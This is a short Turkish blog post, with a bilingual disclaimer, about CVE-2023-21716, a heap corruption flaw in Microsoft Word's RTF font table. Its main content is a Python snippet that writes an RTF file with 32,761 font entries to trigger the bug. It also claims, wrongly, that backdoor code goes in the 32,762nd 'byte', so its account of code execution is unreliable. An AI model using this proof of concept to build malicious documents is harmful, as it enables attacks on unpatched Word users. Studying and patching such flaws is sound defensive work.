Disclaimer
The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.
Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için
yasal sayfasını inceleyebilirsiniz .
Zafiyet Adı: CVE-2023-21716 Microsoft Word RTF Font Table Heap Corruption
Zafiyet Kapasitesi: Uzaktan kod yürütme
Zafiyet Tarihi: 10.03.2023
Zafiyetin Uygulanması
- Python koduyla bir RTF dosyası oluşturulur.
with open('t3zt.rtf','wb') as data:
data.write(('{\\rtf1{\n{\\fonttbl' + ''.join([ ('{\\f%dA;}\n' % i) for i in range(0,32761) ]) + '}\n{\\rtlch no crash??}\n}}\n').encode('utf-8'))
- Kod içeriğinde 32761 inci baytta çökmesi için gerekli etken sağlanır ve 32762 inci bayt içerisinde arka kapı açacak (backdoor) kod girilir.
Zafiyetin Giderilmesi
- Word sürümleri güncellenmelidir.
Zafiyet Güncellemeleri
CVE-2023-21716 - Security Update Guide - Microsoft - Microsoft Word Remote Code Execution Vulnerability